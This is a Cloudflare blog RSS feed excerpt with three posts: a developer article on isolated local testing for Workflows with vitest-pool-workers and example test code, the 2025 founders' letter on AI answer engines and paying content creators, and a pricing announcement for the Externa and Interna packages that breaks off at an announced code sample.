            <content:encoded><![CDATA[ <p><a href="https://www.cloudflare.com/developer-platform/products/workflows/"><u>Cloudflare Workflows</u></a> is our take on "Durable Execution": a serverless engine, powered by the <a href="https://www.cloudflare.com/developer-platform/"><u>Cloudflare Developer Platform</u></a>, for building long-running, multi-step applications that persist through failures. When Workflows became <a href="https://blog.cloudflare.com/workflows-ga-production-ready-durable-execution/"><u>generally available</u></a> earlier this year, it let developers orchestrate complex processes that would be difficult or impossible to manage with traditional stateless functions. Workflows handle state, retries, and long waits, allowing you to focus on your business logic.</p><p>However, complex orchestrations require robust testing to be reliable. To date, testing Workflows has been a black-box process. Although you could check whether a Workflow instance reached completion by awaiting its status, there was no visibility into the intermediate steps. This made debugging really difficult. Did the payment processing step succeed? Did the confirmation email step receive the correct data? You couldn't be sure without inspecting external systems or logs. </p>
    <div>
      <h3>Why was this necessary?</h3>
      <a href="#why-was-this-necessary">
        
      </a>
    </div>
    <p>As developers ourselves, we understand the need to ensure reliable code, and we heard your feedback loud and clear: the developer experience for testing Workflows needed to be better.</p><p>The black-box nature of testing was one part of the problem. Beyond that, though, the limited testing on offer came at a high cost. If you added a workflow to your project, even if you weren't testing the workflow directly, you were required to disable isolated storage because we couldn't guarantee isolation between tests. Isolated storage is a vitest-pool-workers feature that guarantees each test runs in a clean, predictable environment, free from the side effects of other tests. Being forced to disable it meant that state could leak between tests, leading to flaky, unpredictable, and hard-to-debug failures.</p><p>This created a difficult choice for developers building complex applications. If your project used <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Workers</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a>, and <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a> alongside Workflows, you had to either abandon isolated testing for your <i>entire project</i> or skip testing your Workflows altogether. This friction resulted in a poor testing experience, which in turn discouraged the adoption of Workflows. Solving this wasn't just an improvement; it was a critical <i>step</i> in making Workflows part of any well-tested Cloudflare application.</p>
    <div>
      <h3>Introducing isolated testing for Workflows</h3>
      <a href="#introducing-isolated-testing-for-workflows">
        
      </a>
    </div>
    <p>We're introducing a new set of APIs that enable comprehensive, granular, and isolated testing for your Workflows, all running locally and offline with <code>vitest-pool-workers</code>, our testing framework that supports running tests in the Workers runtime <code>workerd</code>. This enables fast, reliable, and cheap test runs that don't depend on a network connection.</p><p>They are available through the <code>cloudflare:test</code> module, with <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0</b> and above. The new test module provides two primary functions to introspect your Workflows:</p><ul><li><p><code>introspectWorkflowInstance</code>: useful for unit tests with known instance IDs</p></li><li><p><code>introspectWorkflow</code>: useful for integration tests where IDs are typically generated dynamically.</p></li></ul><p>Let's walk through a practical example.</p>
    <div>
      <h3>A practical example: testing a blog moderation workflow</h3>
      <a href="#a-practical-example-testing-a-blog-moderation-workflow">
        
      </a>
    </div>
    <p>Imagine a simple Workflow for moderating a blog. When a user submits a comment, the Workflow requests a review from Workers AI. Based on the violation score returned, it then waits for a moderator to approve or deny the comment. If approved, it calls a <code>step.do</code> to publish the comment via an external API.</p><p>Testing this without our new APIs would be impossible. You'd have no direct way to control each step’s outcome or simulate the moderator's approval. Now, you can mock everything.</p><p>Here’s the test code using <code>introspectWorkflowInstance</code> with a known instance ID:</p>
            <pre><code>import { env, introspectWorkflowInstance } from "cloudflare:test";

it("should mock an ambiguous score, approve the comment, and complete", async () =&gt; {
   // CONFIG
   await using instance = await introspectWorkflowInstance(
       env.MODERATOR,
       "my-workflow-instance-id-123"
   );
   await instance.modify(async (m) =&gt; {
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 50 });
       await m.mockEvent({ 
           type: "moderation-approval", 
           payload: { action: "approved" },
       });
       await m.mockStepResult({ name: "publish comment" }, { status: "published" });
   });

   await env.MODERATOR.create({ id: "my-workflow-instance-id-123" });
   
   // ASSERTIONS
   expect(await instance.waitForStepResult({ name: "AI content scan" })).toEqual(
       { violationScore: 50 }
   );
   expect(
       await instance.waitForStepResult({ name: "publish comment" })
   ).toEqual({ status: "published" });

   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>This test mocks the outcomes of steps that require external API calls, such as the 'AI content scan', which calls <a href="https://www.cloudflare.com/developer-platform/products/workers-ai/"><u>Workers AI</u></a>, and the 'publish comment' step, which calls an external blog API.</p><p>If the instance ID is not known in advance, for example because a Worker request starts one or more Workflow instances with randomly generated IDs, you can call <code>introspectWorkflow(env.MY_WORKFLOW)</code>. Here’s the test code for that scenario, where only one Workflow instance is created:</p>
            <pre><code>it("should mock a non-violation score and complete successfully", async () =&gt; {
   // CONFIG
   await using introspector = await introspectWorkflow(env.MODERATOR);
   await introspector.modifyAll(async (m) =&gt; {
       await m.disableSleeps();
       await m.mockStepResult({ name: "AI content scan" }, { violationScore: 0 });
   });

   await SELF.fetch(`https://mock-worker.local/moderate`);

   const instances = introspector.get();
   expect(instances.length).toBe(1);

   // ASSERTIONS
   const instance = instances[0];
   expect(await instance.waitForStepResult({ name: "AI content scan"  })).toEqual({ violationScore: 0 });
   await expect(instance.waitForStatus("complete")).resolves.not.toThrow();
});</code></pre>
            <p>Notice how in both examples we’re calling the introspectors with <code>await using</code>: this is the <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Resource_management#the_using_and_await_using_declarations"><u>Explicit Resource Management</u></a> syntax from modern JavaScript. It is crucial here because when the introspector objects go out of scope at the end of the test, their disposal methods are automatically called. This is how we ensure each test works with its own isolated storage.</p><p>The <code>modify</code> and <code>modifyAll</code> functions are the gateway to controlling instances. Inside their callback, you get access to a modifier object with methods to inject behavior, such as mocking step outcomes, mocking events, and disabling sleeps.</p><p>You can find detailed documentation in the <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>Workers Cloudflare Docs</u></a>.</p><p><b>How we connected Vitest to the Workflows Engine</b></p><p>To understand the solution, you first need to understand the local architecture. When you run <code>wrangler dev</code>, your Workflows are powered by Miniflare, a simulator for testing Cloudflare Workers, and <code>workerd</code>. Each running workflow instance is backed by its own SQLite Durable Object, which we call the "Engine DO". This Engine DO is responsible for executing steps, persisting state, and managing the instance's lifecycle. It lives inside the local isolated Workers runtime.</p><p>Meanwhile, the Vitest test runner is a separate Node.js process living outside of <code>workerd</code>. This is why we have a custom Vitest pool, vitest-pool-workers, that allows tests to run inside <code>workerd</code>. vitest-pool-workers includes a Runner Worker, which runs the tests with bindings to everything specified in the user’s wrangler.json file. This worker has access to the APIs under the <code>cloudflare:test</code> module, and it communicates with Node.js through a special DO called the Runner Object via WebSocket/RPC.</p><p>The first approach we considered was to use the test Runner Worker. In its current state, the Runner Worker has access to the Workflow bindings for the Workflows defined in the wrangler file. We also considered binding each Workflow's Engine DO namespace to this Runner Worker. This would give vitest-pool-workers direct access to the Engine DOs, making it possible to call Engine methods directly. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3ptKRqwpfvK1dxY6T5Kuin/fbf92915b2d2a95542bf6bec8addd5ad/image1.png" />
          </figure><p>While promising, this approach would have required undesirable changes to the core of Miniflare and vitest-pool-workers, making it too invasive for this single feature. </p><p>Firstly, we would have needed to add a new <i>unsafe</i> field to Miniflare's Durable Objects. Its sole purpose would be to specify the service name of our Engines, preventing Miniflare from applying its default user prefix, which would otherwise prevent the Durable Objects from being found.</p><p>Secondly, vitest-pool-workers would have been forced to bind every Engine DO from the Workflows in the project to its runner, even those not being tested. This would introduce unwanted bindings into the test environment, requiring an additional cleanup step to ensure they were not exposed to the user's test env.</p><p><b>The breakthrough</b></p><p>The solution is a combination of privileged local-only APIs and Remote Procedure Calls (RPC).</p><p>First, we added a set of <code>unsafe</code> functions to the <i>local</i> implementation of the Workflows binding, functions that are not available in the production environment. They act as a controlled access point, accessible from the test environment, allowing the test runner to get a stub to a specific Engine DO by providing its instance ID.</p><p>Once the test runner has this stub, it uses RPC to call specific, trusted methods on the Engine DO via a special <code>RpcTarget</code> called <code>WorkflowInstanceModifier</code>. Any class that extends <code>RpcTarget</code> has its objects replaced by a stub. Calling a method on this stub, in turn, makes an RPC back to the original object.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3AObAsJuBplii3aeqMw2bn/74b21880b09a293fef6f84de1ae1318e/image2.png" />
          </figure><p>This simpler approach is far less invasive because it's confined to the Workflows environment, which also ensures any future feature changes are safely isolated.</p><p><b>Introspecting Workflows with unknown IDs</b></p><p>When creating Workflows instances (either by <code>create()</code> or <code>createBatch()</code>) developers can provide a specific ID or have it automatically generated for them. This ID identifies the Workflow instance and is then used to create the associated Engine DO ID.</p><p>The logical starting point for implementation was <code>introspectWorkflowInstance(binding, instanceID)</code>, as the instance ID is known in advance. This allows us to generate the Engine DO ID required to identify the engine associated with that Workflow instance.</p><p>But often, one part of your application (like an HTTP endpoint) will create a Workflow instance with a randomly generated ID. How can we introspect an instance when we don't know its ID until after it's created?</p><p>The answer was to use a powerful feature of JavaScript: <code>Proxy</code> objects.</p><p>When you use <code>introspectWorkflow(binding)</code>, we wrap the Workflow binding in a Proxy. This proxy non-destructively intercepts all calls to the binding, specifically looking for <code>.create()</code> and <code>.createBatch()</code>. When your test triggers a workflow creation, the proxy inspects the call. It captures the instance ID — either one you provided or the random one generated — and immediately sets up the introspection on that ID, applying all the modifications you defined in the <code>modifyAll</code> call. The original creation call then proceeds as normal.</p>
            <pre><code>env[workflow] = new Proxy(env[workflow], {
  get(target, prop) {
    if (prop === "create") {
      return new Proxy(target.create, {
        async apply(_fn, _this, [opts = {}]) {

          // 1. Ensure an ID exists
          const optsWithId = "id" in opts ? opts : { id: crypto.randomUUID(), ...opts };

          // 2. Apply test modifications before creation
          await introspectAndModifyInstance(optsWithId.id);

          // 3. Call the original 'create' method
          return target.create(optsWithId);
        },
      });
    }

    // Same logic for createBatch(); every other property passes through
    return Reflect.get(target, prop);
  },
});</code></pre>
            <p>When the <code>await using</code> block from <code>introspectWorkflow()</code> finishes, or the <code>dispose()</code> method is called at the end of the test, the introspector is disposed of, and the proxy is removed, leaving the binding in its original state. It’s a low-impact approach that prioritizes developer experience and long-term maintainability.</p>
    <div>
      <h3>Get started with testing Workflows</h3>
      <a href="#get-started-with-testing-workflows">
        
      </a>
    </div>
    <p>Ready to add tests to your Workflows? Here’s how to get started:</p><ol><li><p><b>Update your dependencies:</b> Make sure you are using <code>@cloudflare/vitest-pool-workers</code> version <b>0.9.0 </b>or newer. Run the following command in your project: <code>npm install @cloudflare/vitest-pool-workers@latest</code></p></li><li><p><b>Configure your test environment:</b> If you're new to testing on Workers, follow our <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/write-your-first-test/"><u>guide to write your first test</u></a>.</p></li></ol><p><b>Start writing tests</b>: Import <code>introspectWorkflowInstance</code> or <code>introspectWorkflow</code> from <code>cloudflare:test</code> in your test files and use the patterns shown in this post to mock, control, and assert on your Workflow's behavior. Also check out the official <a href="https://developers.cloudflare.com/workers/testing/vitest-integration/test-apis/#workflows"><u>API reference</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Internship Experience]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Workflows]]></category>
            <guid isPermaLink="false">5Kq3w0WQ8bFIvLmxsDpIjO</guid>
            <dc:creator>Olga Silva</dc:creator>
            <dc:creator>Mia Malden</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare’s 2025 Annual Founders’ Letter]]></title>
            <link>https://blog.cloudflare.com/cloudflare-2025-annual-founders-letter/</link>
            <pubDate>Sun, 21 Sep 2025 18:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare launched 15 years ago. We like to celebrate our birthday by launching new products that give back to the Internet. But we've also been thinking a lot about what's changed on the Internet. ]]></description>
            <content:encoded><![CDATA[ <p></p><p>Cloudflare <a href="https://www.youtube.com/watch?v=XeKWeBw1R5A"><u>launched 15 years ago</u></a> this week. We like to celebrate our birthday by announcing new products and features that give back to the Internet, which we’ll do a lot of this week. But, on this occasion, we've also been thinking about what's changed on the Internet over the last 15 years and what has not.</p><p>With some things there's been clear progress: when we launched in 2010 less than 10 percent of the Internet was encrypted, today well over 95 percent is encrypted. We're proud of the <a href="https://blog.cloudflare.com/introducing-universal-ssl/"><u>role we played in making that happen</u></a>.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/2MLknOh75r4KpCfiXTjQkw/b80baa01b75437f3b1da24be3ca9e209/Timeline_2_part.png" />
          </figure>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5xkR8gdKR1YO1tIr6rLOmv/7e848bbefa83db1078d7ffe35e2bcc51/2.png" />
          </figure><p>Some other areas have seen limited progress: IPv6 adoption has grown steadily but painfully slowly over the last 15 years, in <a href="https://blog.cloudflare.com/introducing-cloudflares-automatic-ipv6-gatewa/"><u>spite</u></a> <a href="https://blog.cloudflare.com/cloudflare-expanding-the-ipv6-web/"><u>of</u></a> <a href="https://blog.cloudflare.com/eliminating-the-last-reasons-to-not-enable-ipv6/"><u>our</u></a> <a href="https://blog.cloudflare.com/amazon-2bn-ipv4-tax-how-avoid-paying/"><u>efforts</u></a>. That's a problem because as IPv4 addresses have become scarce and expensive it’s held back new entrants and driven up the costs of things like networking and cloud computing.</p>
    <div>
      <h2>The Internet’s Business Model</h2>
      <a href="#the-internets-business-model">
        
      </a>
    </div>
    <p>Still other things have remained remarkably consistent: the basic business model of the Internet has for the last 15 years been the same — create compelling content, find a way to be discovered, and then generate value from the resulting traffic. Whether that was through ads or subscriptions or selling things or just the ego of knowing that someone is consuming what you created, traffic generation has been the engine that powered the Internet we know today.</p><p>Make no mistake, the Internet has never been free. There's always been a reward system that transferred value from consumers to creators and, in doing so, filled the Internet with content. Had the Internet not had that reward system it wouldn't be nearly as vibrant as it is today.</p><p>A bit of a trivia aside: why did Cloudflare never build an ad blocker <a href="https://www.answeroverflow.com/m/1123890164222144542"><u>despite many requests</u></a>? Because, as imperfect as they are, ads have been the only micropayment system that has worked at scale to encourage an open Internet while also compensating content creators for their work. Our mission is to help build a better Internet, and a core value is that we’re principled, so we weren’t going to hamper the Internet’s fundamental business model.</p>
    <div>
      <h2>Traffic ≠ Value</h2>
      <a href="#traffic-value">
        
      </a>
    </div>
    <p>But that same traffic-based reward system has also created many of the problems we lament about the current state of the Internet. Traffic has always been an imperfect proxy for value. Over the last 15 years we've watched more of the Internet driven by annoying clickbait or dangerous ragebait. Entire media organizations have built their businesses with a stated objective of writing headlines to generate the maximum cortisol response because that's what generates the maximum amount of traffic.</p><p>Over the years, Cloudflare has at times faced calls for us to intervene and control what content can be published online. As an infrastructure provider, we've never felt we were the right place for those editorial decisions to be made. But it wasn't because we didn't worry about the direction the traffic-incentivized Internet seemed to be headed. It always seemed like what fundamentally needed to change was not more content moderation at the infrastructure level but instead a healthier incentive system for content creation.</p><p>Today the conditions to bring about that change may be happening. In the last year, something core to the Internet we’ve all known has changed. It's being driven by AI and it has an opportunity with some care and nurturing to help bring about what we think may be a much better Internet.</p>
    <div>
      <h2>From Search to Answers</h2>
      <a href="#from-search-to-answers">
        
      </a>
    </div>
    <p>What’s the change? The primary discovery system of the Internet for the last 15 years has been Search Engines. They scraped the Internet's content, built an index, and then presented users with a treasure map, which they followed, generating traffic. Content creators were happy to let Search Engines scrape their content because there were a limited number of them, so the infrastructure costs were relatively low, and, more importantly, because the Search Engines gave something back to sites in the form of traffic — the Internet’s historic currency.</p><p>It’s already clear that the Internet’s discovery system for the next 15 years will be something different: Answer Engines. Unlike Search Engines, which gave you a map where you hunted for what you were looking for, driving traffic in the process, Answer Engines just give you the answer without you having to click on anything. For 95 percent of users, 95 percent of the time, that is a better user experience.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d2TQwVHA8GpFUBpAdr8QT/23fd6b7306d55dce3dea9e989784595d/BLOG-2994_3.png" />
          </figure><p>You don’t have to look far to see this is changing rapidly before our eyes. ChatGPT, Anthropic’s Claude, and other AI startups aren’t Search Engines — they’re Answer Engines. Even Google, the search stalwart, is increasingly serving “AI Overviews” in place of 10 blue links. We can often look to sci-fi movies for a glimpse of our most likely future. In them, the helpful intelligent robot character didn’t answer questions with: “Here are some links you can click on to maybe find what you’re looking for.” Whether you like it or not, the future will increasingly be answers, not searches.</p>
    <div>
      <h2>Short Term Pain</h2>
      <a href="#short-term-pain">
        
      </a>
    </div>
    <p>In the short term, this is going to be extremely painful for some industries built on monetizing traffic. It already is. While ecommerce and social applications haven't yet seen a significant drop in traffic as the world switches to Answer Engines, media companies have. Why the difference? Well, for the former, you still need to buy the thing the Answer Engine recommends and, for now, we still value talking with other humans.</p><p>But for media companies, if the Answer Engine gives you a summary of what you’re looking for, in most cases you don’t need to read the story. And the loss of traffic for media companies has already been dramatic. It’s not just traditional media. Research groups at investment banks, industry analysts, major consulting firms — they’re all seeing major drops in people finding their content because we are increasingly getting answers, not search treasure maps.</p><p>Some say these answer engines or agents are just acting on behalf of humans. Sure, but so what? Without a change, they will still kill content creators’ businesses. If you ask your agent to summarize twenty different news sources but never actually visit any of them, you’re still undermining the business model of those news sources. Agents don’t click on ads. And if those agents are allowed to aggregate information on behalf of multiple users, it’s an even bigger problem, because then subscription revenue is eliminated as well. Why subscribe to the Wall Street Journal or New York Times or Financial Times or Washington Post if my agent can free ride off some other user who does?</p><p>Unless you believe that content creators should work for free, or that they are somehow not needed anymore — both of which are naive assumptions — something needs to change. A visit from an agent isn’t the same as a visit from a human and therefore should have different rules of the road. 
If nothing changes, the drop in human traffic to the media ecosystem writ large will kill the business model that has built the content-rich Internet we enjoy today.</p><p>We think that’s an existential threat to one of humanity’s most important creations: the Internet.</p>
    <div>
      <h2>Rewarding Better Content</h2>
      <a href="#rewarding-better-content">
        
      </a>
    </div>
    <p>But there’s reason for optimism. Content is the fuel that powers every AI system, and the companies that run those AI systems know that ultimately they need to financially support the ecosystem. Because of that, we may be on the cusp of a new, better, and healthier Internet business model. As content creators use tools like the <a href="https://blog.cloudflare.com/introducing-ai-crawl-control/"><u>ones provided by Cloudflare to restrict AI robots from taking their content without compensation</u></a>, we're already seeing a market emerge and better deals being struck between AI and content companies.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5J0hmMolAcrPKBZSJzKNMw/d78a04e0ae0afb2c578e7b7c1ca8b1c9/BLOG-2994_4.png" />
          </figure><p>What's most interesting is which content companies are getting the best deals. It's not the ragebait headline writers. It's not the news organizations writing yet another take on what's going on in politics. It's not the spammy content farms full of drivel. Instead, it's <a href="https://www.bloomberg.com/news/articles/2025-09-17/reddit-seeks-to-strike-next-ai-content-pact-with-google-openai"><u>Reddit</u></a> and other quirky corners that best remind us of the Internet of old. For those of you old enough, think back to the Internet not of the last 15 years but of the last 35. We’ve lost some of what made that early Internet great, but there are indications that we might finally have the incentives to bring more of it back.</p><p>It seems increasingly likely that in our future AI-driven Internet — assuming the AI companies are willing to step up, support the ecosystem, and pay for the content that is the most valuable to them — it’s the creative, local, unique, original content that’ll be worth the most. And, if you’re like us, the thing you as an Internet consumer are craving more of is creative, local, unique, original content. And, it turns out, having talked with many of them, that’s the content that content creators are most excited to create.</p>
    <div>
      <h2>A New Internet Business Model</h2>
      <a href="#a-new-internet-business-model">
        
      </a>
    </div>
    <p>So how will the business model work? Well, for the first time in history, we have a pretty good mathematical representation of human knowledge. Sum up all the LLMs and that's what you get. It's not perfect, but it's pretty good. Inherently, the same mathematical model serves as a map of the gaps in human knowledge. Like a block of Swiss cheese — there's a lot of cheese, but there are also a lot of holes.</p><p>Imagine a future business model of the Internet that doesn't reward traffic-generating ragebait but instead rewards the content creators who help fill in the holes in our collective metaphorical cheese. That will involve some portion of the subscription fees AI companies collect, and some portion of the revenue from the ads they'll inevitably serve, going back to the content creators who most enrich the collective knowledge.</p><p>As a rough and simplistic sketch, think of it as some number of dollars per AI company’s monthly active user going into a collective pool, to be distributed to content creators based on what most fills in the holes in the cheese.</p><p>You could imagine an AI company suggesting to creators the topics it doesn't yet have enough content about. Say, for example, the carrying capacity of unladen swallows, because it knows its subscribers of a certain age and proclivity are always looking for answers about that topic. The very pruning algorithms the AI companies use today form a roadmap for what content is worth enough to not be pruned but paid for.</p><p>While today the budget items that differentiate AI companies are how much they can afford to spend on GPUs and top talent, as those things inevitably become commoditized, it seems likely that what will differentiate the different AIs is their access to creative, local, unique, original content. And the math of their algorithms provides them a map of what’s worth the most. 
While there are a lot of details to work out, those are the ingredients you need for a healthy market.</p>
    <div>
      <h2>Cloudflare’s Role</h2>
      <a href="#cloudflares-role">
        
      </a>
    </div>
    <p>As we think about our role at Cloudflare in this developing market, it's not about protecting the status quo but instead about helping catalyze a better business model for the future of Internet content creation. That means creating a level playing field. Ideally there should be lots of AI companies, large and small, and lots of content creators, large and small.</p><p>It can’t be that a new entrant AI company is at a disadvantage to a legacy search engine because one has to pay for content while the other gets it for free. But it’s also critical to realize that the right solution to that conundrum isn’t that no one pays; it’s that, new or old, everyone who benefits from the ecosystem should contribute back to it based on their relative size.</p><p>It may seem impossibly idealistic today, but the good news is that, based on the conversations we’ve had, we’re confident that if a few market participants tip — whether because they step up and do the right thing or are compelled to — we will see the entire market tip and become robust very quickly.</p>
    <div>
      <h2>Supporting the Ecosystem</h2>
      <a href="#supporting-the-ecosystem">
        
      </a>
    </div>
    <p>We can't do this alone and we have no plans to try to. Our mission is not to “build a better Internet” but to “<b><i>help</i></b> build a better Internet.” The solutions developed to facilitate this market need to be open, collaborative, standardized, and shared across many organizations. We’ll take some encouraging steps in that direction with announcements on partnerships and collaborations this week. And we’re proud to be a leader in this space.</p><p>The Internet is an ecosystem and we, other infrastructure providers, along with most importantly both AI companies and content creators, will be critical in ensuring that ecosystem is healthy. We’re excited to partner with those who are ready to step up and do their part to also help build a better Internet. It is possible.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EHC7vxXoMmle1QFHwGHh9/408b73f7b677701e7242e794efa3cb52/unnamed__29_.png" />
          </figure><p>And we're optimistic that if others can collaborate in supporting the ecosystem we may be at the cusp of a new golden age of the Internet. Our conversations with the leading AI companies nearly all acknowledge that they have a responsibility to give back to the ecosystem and compensate content creators. Confirming this, the largest publishers are reporting they're having much more constructive conversations about licensing their content to those AI companies. And, this week, we'll be announcing new tools to help even the smallest publishers take back control of who can use what they've created.</p><p>It may seem impossible. We think it’s a no-brainer. We're proud of what Cloudflare has accomplished over the last 15 years, but there’s a lot left to do to live up to our mission. So, more than ever, it's clear: giddy up, because we're just getting started!</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/15o6NDQsh19vfz6RC9nD5v/03f8f84dc09366ffc617829f35b2e255/BLOG-2994_5.png" />
          </figure><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Founders' Letter]]></category>
            <guid isPermaLink="false">3dHDa6KprJoyjJldD2eInH</guid>
            <dc:creator>Matthew Prince</dc:creator>
            <dc:creator>Michelle Zatlyn</dc:creator>
        </item>
        <item>
            <title><![CDATA[Aligning our prices and packaging with the problems we help customers solve]]></title>
            <link>https://blog.cloudflare.com/aligning-our-prices-and-packaging-with-the-problems-we-help-customers-solve/</link>
            <pubDate>Mon, 11 Aug 2025 23:03:00 GMT</pubDate>
            <description><![CDATA[ You asked for simplicity. We listened. Introducing Externa and Interna, two new use-case-driven packages to simplify how you connect and protect your entire infrastructure. ]]></description>
            <content:encoded><![CDATA[ <p>At Cloudflare, we have a simple but audacious goal: to help build a better Internet. That mission has driven us to build one of the <a href="https://www.cloudflare.com/network/"><u>world’s largest networks</u></a>, to <a href="https://blog.cloudflare.com/content-independence-day-no-ai-crawl-without-compensation/"><u>stand up for content providers</u></a>, and to innovate relentlessly to make the Internet safer, faster, and more reliable for everyone, everywhere.</p><p>Building world-class products is only part of the battle, however. Fulfilling our mission means making these products accessible, including a pricing model that is fair, predictable, and aligned with the value we provide. If our packaging is confusing, or if our pricing penalizes you for using the service, then we’re not living up to our <a href="https://www.cloudflare.com/about-overview/"><u>mission</u></a>. And the best way to ensure that alignment?</p><p>Listen to our customers.</p><p>Over the years, your feedback has shaped our product roadmap, helping us evolve to offer <a href="https://developers.cloudflare.com/products/"><u>nearly 100 products</u></a> across four solution areas — <a href="https://www.cloudflare.com/application-services/#application-services-case-products"><u>Application Services</u></a>, <a href="https://www.cloudflare.com/network-services/#network-services-products"><u>Network Services</u></a>, <a href="https://www.cloudflare.com/zero-trust/#platform-capabilities"><u>Zero Trust Services</u></a>, and our <a href="https://www.cloudflare.com/plans/developer-platform/"><u>Developer Platform</u></a> — on a single, unified platform and network infrastructure. Recently, we’ve heard a new theme emerge: the need for simplicity. You’ve asked us, “A hundred products is a lot. Can you please be more prescriptive?” and “Can you make your pricing more straightforward?”</p><p>We heard that feedback loud and clear. 
That's why we are incredibly excited to introduce <b>Externa</b> and <b>Interna</b>,<b> </b>two new families of <a href="http://cloudflare.com/plans/enterprise"><u>use-case bundles</u></a> designed to simplify your journey with Cloudflare.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6YAEafOTtpzusmVvdqDVXY/876ca11211dadf6bbe6750719a3df476/image6.png" />
          </figure>
    <div>
      <h2>Two challenges, two solutions</h2>
      <a href="#two-challenges-two-solutions">
        
      </a>
    </div>
    <p>When we speak with CIOs, CTOs, and CISOs, their challenges almost always boil down to connecting and protecting two fundamental domains: (1) their external, public-facing infrastructure and (2) their internal, private systems.</p><p>Historically, the industry has sold dozens of point products to solve these problems with a series of band-aids. A WAF from one vendor, a DDoS scrubber from another, a VPN from a third. The result is a mess of complexity, vendor lock-in, and a security posture riddled with gaps. It’s expensive, inefficient, and insecure. </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6QQlNLsDlXy6KDC1CtlIt7/4adb4bb9fd09e6cdd4501193dabdbff8/image1.png" />
          </figure><p>We think that’s backwards. There’s a simpler, more integrated approach with our new solution packages:</p><ul><li><p><a href="http://cloudflare.com/plans/enterprise/externa"><b><u>Externa</u></b></a> to connect and protect the part of your business facing the public Internet — the websites, APIs, applications, and networks that are the front doors and face of your business</p></li><li><p><a href="http://cloudflare.com/plans/enterprise/interna"><b><u>Interna</u></b></a> to connect and protect your internal private systems and resources — the employees, devices, data, and networks that are at the heart of your organization</p></li></ul><p>These packages represent our prescriptive view on what a modern connectivity and security architecture should look like. And, they’re best when used together.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6fBZrEDR6ZjbyXI7H4A6ca/dc516fb5df17b3dfffe50e91046c7b77/image2.png" />
          </figure>
    <div>
      <h3>Externa: Connect and protect external, public-facing systems </h3>
      <a href="#externa-connect-and-protect-external-public-facing-systems">
        
      </a>
    </div>
    <p>With Externa, we’re solving for the complexity of connecting and protecting your public-facing infrastructure. A key principle here is fairness. We’ve seen competitors send customers astronomical bills after a DDoS attack because they charge for all traffic — clean or malicious. It’s like a fire department charging you for the water they use to save your house. We don’t do that and never have, which is why with Externa, you only pay for legitimate traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3WMMfD7mIQQiuErqQYdbEl/d93735230352c83164155eeb25f2c358/image7.png" />
          </figure><p>We believe a simple, integrated model will reduce total cost of ownership and lead to a stronger security posture. A patchwork of band-aids is a lot of overhead to manage. Externa bundles our WAF, DDoS, API security, networking, application performance services, and more, into a simple package with units of measure that scale with value.</p><p>What does this mean for you?</p><ul><li><p><b>No attack traffic tax:</b> your costs remain predictable, even during a massive DDoS attack.</p></li><li><p><b>Simple, value-driven price units: </b>no origin fetch fees, duplicate charges per request, or paying per rule.</p></li><li><p><b>Simplified connectivity costs:</b> free private interconnects to on-ramp easily, wherever you’re hosted.</p></li></ul><p>And because security shouldn’t stop at your perimeter, every Externa package includes 50 seats of Interna, our SASE solution package.</p>
    <div>
      <h3>Interna: Connect and protect internal, private systems </h3>
      <a href="#interna-connect-and-protect-internal-private-systems">
        
      </a>
    </div>
    <p>With Interna, we’re fixing the broken economics of networking and security. The old models were built for a world where everyone came into an office. The world has changed: in today’s hybrid work environment, your internal network isn't just confined to your offices and data centers anymore. It's wherever your employees and data are. But many vendors still effectively charge you twice for the same user — once for the seat and again when they’re using the office network.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4tj5DIu3g9Nt3Bofez1wrt/33e87281bc08e37aec8a7cd968bab7eb/image3.png" />
          </figure><p>We believe you should never pay for user bandwidth. Our model recognizes that a user is a user, wherever they are; we don’t double-charge for bandwidth; we actually subtract the traffic that’s generated from user device clients from your WAN meter. We’ve gone a step further: every Interna user license contributes to a shared bandwidth pool that you can use to build a modern, secure, and fast corporate WAN. With Interna, the budget you already have for security now builds your corporate network, too.</p><p>What does this mean for you?</p><ul><li><p><b>Never pay for user bandwidth:</b> a single per-seat price covers your users wherever they work, reducing your WAN bill and eliminating the hybrid work penalty.</p></li><li><p><b>Each license expands your WAN:</b> pooled bandwidth from user licenses helps you replace expensive, dedicated WAN contracts.</p></li><li><p><b>All-inclusive security: </b>premium features like Digital Experience Monitoring (DEM) and both in-line and API-based Cloud Access Security Broker (CASB) are included, not expensive add-ons.</p></li></ul>
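<p>To make the metering model concrete, here is a small Python sketch of how the seat-pooled bandwidth and the client-traffic subtraction described above interact. The per-seat pool size and the billing units are made-up numbers for illustration, not Cloudflare’s actual pricing:</p>

```python
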